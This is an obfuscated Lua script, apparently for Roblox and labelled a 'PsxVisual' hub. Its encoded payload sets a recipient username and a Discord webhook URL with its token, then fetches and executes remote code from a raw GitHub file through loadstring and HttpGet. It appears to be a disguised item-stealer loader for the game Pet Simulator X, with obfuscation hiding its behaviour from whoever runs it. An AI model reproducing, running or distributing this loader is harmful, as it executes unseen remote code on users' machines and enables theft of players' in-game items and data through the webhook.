--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v73=v2(v0(v30,16));if v19 then local v93=v5(v73,v19);v19=nil;return v93;else return v73;end end end);local function v20(v31,v32,v33)if v33 then local v74=0 -(1637 -(1523 + 114)) ;local v75;while true do if (v74==(0 + 0)) then v75=(v31/(2^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-((2 -0) -1))) + (620 -(555 + 64)))) ;return v75-(v75%((1997 -(68 + 997)) -(857 + 74))) ;end end else local v76=568 -(367 + 201) ;local v77;while true do if (v76==(927 -((1484 -(226 + 1044)) + 713))) then v77=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v77 + v77))>=v77) and 1) or (877 -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==(118 -(32 + 85))) then return (v37 * (251 + 5)) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -(3 -1)) ;v35=1 -0 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (354 -(87 + 263)) ;return (v41 * (16777396 -(67 + 113))) + (v40 * (48056 + (42916 -25436))) + (v39 * 256) + v38 ;end local function v24()local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 0)) then v45=3 -2 ;v46=(v20(v44,1,972 -(802 + 150) ) * ((5 -3)^(57 -25))) + v43 ;v42=2 + (438 -(145 + 293)) ;end if (v42==(1000 -(915 + 82))) then if (v47==(0 -0)) then if (v46==((430 -(44 + 386)) + 0)) then return v48 * ((1486 -(998 + 488)) -(0 + 0)) ;else v47=1;v45=1187 -(1069 + 118) ;end elseif (v47==(4643 -2596)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1015 + 8) ) * (v45 + (v46/((793 -(302 + 66 + 423))^(824 -(201 + 571))))) ;end if (v42==((1138 -(116 + 1022)) -0)) then v43=v23();v44=v23();v42=19 -(10 + 8) ;end if (v42==((29 -22) -5)) then v47=v20(v44,21,473 -(416 + 26) );v48=((v20(v44,102 -70 )==(1 + 0)) and  -(1 -0)) or (1 + 0) ;v42=10 -7 ;end end end local function v25(v49)local v50=0 -0 ;local v51;local v52;while true do if (v50==(861 -(814 + 45))) then v52={};for v94=2 -(1424 -(630 + 793)) , #v51 do v52[v94]=v2(v1(v3(v51,v94,v94)));end v50=1 + 2 ;end if (v50==0) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=1 + 0 ;end if (v50==(886 -(261 + 624))) then v51=v3(v16,v18,(v18 + v49) -((3 -2) -0) );v18=v18 + v49 ;v50=2;end if (v50==(1083 -(1020 + 60))) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;while true do local v66=0;local v67;while true do if ((0 + 0)~=v66) then else v67=0 + 0 ;while true do if (v67==(0 + 0)) then local v100=0;while true do if (v100==(0 -0)) then if (v53==(0 -0)) then local v103=0;while true do if (v103==(5 -3)) then v53=1 + 0 ;break;end if ((0 + 0)==v103) then v54={};v55={};v103=397 -(115 + 281) ;end if (1==v103) then v56={};v57={v54,v55,nil,v56};v103=2;end end end if (v53==(4 -2)) then local v104=0 -0 ;while true do if (v104==(868 -(550 + 317))) then for v129=1901 -(106 + 1794) ,v23() do v56[v129]=v23();end return v57;end if (v104~=(0 + 0)) then else for v131=1 -0 ,v23() do local v132=0;local v133;while true do if (v132~=(0 -0)) then else v133=v21();if (v20(v133,2 -1 ,286 -(134 + 151) )==(0 -0)) then local v142=1665 -(970 + 695) ;local v143;local v144;local v145;local v146;while true do if (v142==(3 -1)) then while true do if (v143~=3) then else if (v20(v145,587 -(57 + 527) ,1430 -(41 + 1386) )==(104 -(17 + 86))) then v146[4]=v59[v146[3 + 1 ]];end v54[v131]=v146;break;end if (v143==2) then if (v20(v145,1991 -(582 + 1408) ,2 -1 )~=(3 -2)) then else v146[168 -(122 + 44) ]=v59[v146[2 -0 ]];end if (v20(v145,6 -4 ,2)==1) then v146[3]=v59[v146[3]];end v143=3 + 0 ;end if (v143~=(0 -0)) then else local v165=0 -0 ;while true do if (v165==1) then v143=1825 -(1195 + 629) ;break;end if (v165==0) then v144=v20(v133,3 -1 ,68 -(30 + 35) );v145=v20(v133,3 + 1 ,6);v165=1 -0 ;end end end if ((242 -(187 + 54))==v143) then local v166=780 -(162 + 618) ;while true do if (v166~=1) then else v143=1214 -(323 + 889) ;break;end if (v166==0) then v146={v22(),v22(),nil,nil};if (v144==0) then local v175=0 + 0 ;local v176;local v177;while true do if (v175==1) then while true do if (v176==(0 -0)) then v177=0 -0 ;while true do if ((413 -(15 + 398))==v177) then v146[985 -(18 + 964) ]=v22();v146[1 + 3 ]=v22();break;end end break;end end break;end if (v175==(0 -0)) then local v179=1636 -(1373 + 263) ;while true do if (v179==(1 + 0)) then v175=851 -(20 + 830) ;break;end if ((0 + 0)==v179) then v176=1000 -(451 + 549) ;v177=nil;v179=1;end end end end elseif (v144==(1 + 0)) then v146[741 -(542 + 196) ]=v23();elseif (v144==(3 -1)) then v146[1 + 2 ]=v23() -((2 + 0)^(24 -8)) ;elseif (v144==(4 -1)) then local v181=1384 -(746 + 638) ;local v182;local v183;while true do if (v181~=(1 + 0)) then else while true do if ((0 -0)==v182) then v183=0 + 0 ;while true do if (v183~=(0 -0)) then else v146[4 -1 ]=v23() -((1553 -(1126 + 425))^16) ;v146[345 -(218 + 123) ]=v22();break;end end break;end end break;end if (v181==0) then v182=1581 -(1535 + 46) ;v183=nil;v181=1 + 0 ;end end end v166=1;end end end end break;end if (v142~=(1121 -(118 + 1003))) then else v143=0 + 0 ;v144=nil;v142=378 -(142 + 235) ;end if (v142==(561 -(306 + 254))) then v145=nil;v146=nil;v142=2;end end end break;end end end for v134=1 + 0 ,v23() do v55[v134-(1 -0) ]=v28();end v104=1468 -(899 + 568) ;end end end v100=1;end if (v100~=(1 + 0)) then else v67=2 -1 ;break;end end end if (v67~=(978 -(553 + 424))) then else if (v53==(604 -(268 + 335))) then local v101=290 -(60 + 230) ;while true do if (v101~=(574 -(426 + 146))) then else v53=1 + 1 ;break;end if (v101~=(1457 -(282 + 1174))) then else local v105=0;while true do if (v105~=(811 -(569 + 242))) then else for v136=2 -1 ,v58 do local v137=0 + 0 ;local v138;local v139;local v140;local v141;while true do if (v137~=1) then else v140=nil;v141=nil;v137=1026 -(706 + 318) ;end if (v137==(2 + 0)) then while true do if (v138==(2 -1)) then v141=nil;while true do if (v139==(1252 -(721 + 530))) then if (v140==1) then v141=v21()~=0 ;elseif (v140==(1273 -(945 + 326))) then v141=v24();elseif (v140==(7 -4)) then v141=v25();end v59[v136]=v141;break;end if (v139~=(0 + 0)) then else local v163=0;while true do if (v163==(700 -(271 + 429))) then v140=v21();v141=nil;v163=1;end if (v163==(1 + 0)) then v139=1501 -(1408 + 92) ;break;end end end end break;end if (v138==(0 + 0)) then local v153=1329 -(797 + 532) ;while true do if (v153==(0 + 0)) then v139=1086 -(461 + 625) ;v140=nil;v153=1289 -(993 + 295) ;end if (v153==(1 + 0)) then v138=1;break;end end end end break;end if (v137==0) then v138=1202 -(373 + 829) ;v139=nil;v137=1;end end end v57[3]=v21();v105=1172 -(418 + 753) ;end if (v105==1) then v101=1 + 1 ;break;end end end if (0~=v101) then else v58=v23();v59={};v101=1;end end end break;end end break;end end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=1;local v69= -1;local v70={...};local v71=v12("#",...) -1 ;local function v72()local v78=v63;local v79=v64;local v80=v65;local v81=v27;local v82={};local v83={};local v84={};for v88=1130 -(369 + 761) ,v71 do if ((v88>=v80) or ((1492 + 371 + 1357)==((11658 -8332) -1962))) then v82[v88-v80 ]=v70[v88 + (1 -0) ];else v84[v88]=v70[v88 + (1 -(0 -0)) ];end end local v85=(v71-v80) + 1 ;local v86;local v87;while true do local v89=(87 + 151) -(64 + 174) ;local v90;while true do if ((v89==(0 + 0)) or (((2514 -954) -506)>(2453 + 939))) then v90=336 -(144 + 192) ;while true do if ((v90==(216 -(42 + 174))) or ((508 + 168)>=((4578 -3097) + 161))) then local v102=533 -(43 + 490) ;while true do if ((4136>((1733 + 1397) -(711 + 4 + 18))) and (v102==(1 + 0))) then v90=1 + 0 ;break;end if ((v102==(1504 -(363 + (2389 -(111 + 1137))))) or ((5914 -(1183 + 397))==(12923 -8678))) then v86=v78[v68];v87=v86[1 + 0 ];v102=1745 -(1344 + 400) ;end end end if ((v90==((564 -(91 + 67)) -(255 + 150))) or (((9515 -6318) + (1997 -918))<=((6917 -(340 + 1571)) -(478 + 1435 + (585 -(423 + 100)))))) then if ((v87<=(2 + 1)) or ((12659 -(3107 + 4770))<=(3132 -(565 + 1368)))) then if ((v87<=(3 -(1 + 1))) or ((18292 -(15200 -(1733 + 39)))<(3563 -(1477 + 184)))) then if ((4839>=((11282 -7176) -(183 + 223))) and (v87==(0 -0))) then local v109=0 -0 ;local v110;local v111;local v112;while true do if ((v109==(1 + 0)) or ((1931 -(564 + 292))>(3309 -1391))) then v112=nil;while true do if (((1193 -797)<=(4108 -((1278 -(125 + 909)) + 60))) and (v110==(450 -(108 + 341)))) then while true do if ((v111==(0 + 0)) or ((17625 -(37257 -23801))==(877 + 805 + 505))) then v112=v86[478 -(41 + 435) ];v84[v112]=v84[v112](v13(v84,v112 + (772 -(326 + 445)) ,v69));break;end end break;end if (((2407 -(938 + 63))==(1082 + 324)) and (v110==(1125 -(936 + 189)))) then local v147=0 + 0 ;while true do if (((3144 -(1565 + (209 -161)))<(2639 + 1632)) and ((1139 -(782 + 356))==v147)) then v110=268 -(176 + (2039 -(1096 + 852))) ;break;end if (((1654 -1019)==(23 + 612)) and (v147==0)) then v111=0 -0 ;v112=nil;v147=1093 -(975 + 117) ;end end end end break;end if (((5248 -(157 + 1718))<=((2119 + 2604) -(645 + (1162 -640)))) and (v109==(0 + (0 -0)))) then v110=0 -(0 + 0) ;v111=nil;v109=4 -3 ;end end else v84[v86[6 -4 ]]=v86[3];end elseif ((v87==(1838 -(1045 + 791))) or ((4309 -((1626 -929) + 321))<3280)) then v84[v86[713 -(530 + 181) ]]=v62[v86[(519 -(409 + 103)) -4 ]];else v84[v86[3 -(237 -(46 + 190)) ]][v86[6 -3 ]]=v86[2 + 2 ];end elseif ((((9098 -(614 + 267)) -3831)>=873) and (v87<=(13 -(40 -(19 + 13))))) then if (((2148 -(322 + 905))<=(1713 -(602 + 9))) and (v87==((1288 -(51 + 44)) -(449 + 740)))) then local v119=(1418 -546) -(826 + 46) ;local v120;local v121;local v122;local v123;local v124;while true do if (((5653 -(245 + 702))>=(3042 -2079)) and (v119==(0 + 0))) then v120=1898 -(260 + 1638) ;v121=nil;v119=1 + 0 ;end if ((v119==(442 -(382 + 17 + 41))) or ((3079 -2119)<=(728 + 148))) then v124=nil;while true do if ((v120==((4 -2) + (0 -0))) or ((4269 -2203)==((3405 -(1114 + 203)) -(1074 + 82)))) then for v154=v121,v69 do local v155=0 -0 ;local v156;while true do if (((6030 -(902 + 79 + 224))<((11358 -(228 + 498)) -5789)) and ((0 -(0 -0))==v155)) then v156=0 + (0 -0) ;while true do if (((1690 -(1121 + 569))==v156) or ((4091 -(22 + 192))>=4537)) then v124=v124 + (3 -2) ;v84[v154]=v122[v124];break;end end break;end end end break;end if ((v120==((148 + 535) -(483 + 200))) or (((7590 -(1293 + 519)) -((2864 -1460) + 33 + 26))<(4723 -2997))) then local v148=0 -0 ;while true do if (((766 -((1221 -753) + 297))==v148) or (((4904 -(174 + 489)) -(334 + (593 -365)))<(117 + 508))) then v120=1;break;end if ((v148==(0 -0)) or ((15599 -10974)<(1464 -832))) then v121=v86[1471 -((2426 -1157) + 200) ];v122,v123=v81(v84[v121](v13(v84,v121 + (1 -0) ,v86[5 -2 ])));v148=1 + 0 ;end end end if ((v120==(237 -(141 + 95))) or (((1987 -(830 + 1075)) + (525 -(303 + 221)))>(4581 -2801))) then v69=(v123 + v121) -(1 -0) ;v124=0 -(0 -0) ;v120=1 + (1270 -(231 + 1038)) ;end end break;end if (((1495 -949)<=(758 + 319)) and (v119==(1 + 0))) then v122=nil;v123=nil;v119=2 -0 ;end end else do return;end end elseif ((v87==(4 + 2)) or ((2770 -1774)>((11952 + 2390) -10041))) then local v125=163 -(92 + 71) ;local v126;local v127;local v128;while true do if (((1657 + (5684 -3271))>(340 + 347)) and (v125==(1 + 0))) then v128=nil;while true do if ((v126==((1162 -(171 + 991)) -0)) or ((1421 -(574 + 191))>=(16168 -(6800 + 6038)))) then local v149=0 + 0 ;while true do if ((v149==(2 -(4 -3))) or ((1273 + 1219)<=(1184 -(254 + 595)))) then v126=127 -(55 + 71) ;break;end if (((5693 -1371)>=(4352 -(573 + (3267 -2050)))) and (v149==(0 -0))) then v127=v86[1 + 1 ];v128=v84[v86[(1 + 3) -1 ]];v149=940 -(714 + 225) ;end end end if ((v126==(2 -1)) or ((5070 -1433)>=(409 + 3361))) then v84[v127 + (1 -0) ]=v128;v84[v127]=v128[v86[810 -(118 + 688) ]];break;end end break;end if ((v125==0) or (((6056 -3629) -(25 + 8 + 15))>(887 + 3691))) then v126=(204 + 121) -(45 + 280) ;v127=nil;v125=1887 -(927 + (2055 -(709 + 387))) ;end end else v84[v86[6 -4 ]]();end v68=v68 + (733 -(16 + (2574 -(673 + 1185)))) ;break;end end break;end end end end A,B=v27(v11(v72));if  not A[1] then local v91=0;local v92;while true do if (v91==0) then v92=v60[4][v68] or "?" ;error("Script error at ["   .. v92   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365726E616D6503083O00486964726150737803073O004875624E616D6503093O0050737856697375616C030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130363836393637313339323731342O37342F536A6233774B546D4D444C6D595756612D676574546D656A56436E35334270625456444961392O4B374E4861675963565A4D41706A753336772D6C2D7973366F47657242030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C7561000E3O0012023O00013O0030033O000200030012023O00013O0030033O000400050012023O00013O0030033O000600070012023O00083O001202000100093O00200600010001000A0012010003000B4O0004000100039O0000022O00073O000100012O00053O00017O000E3O00023O00023O00033O00033O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00",v9(),...);end
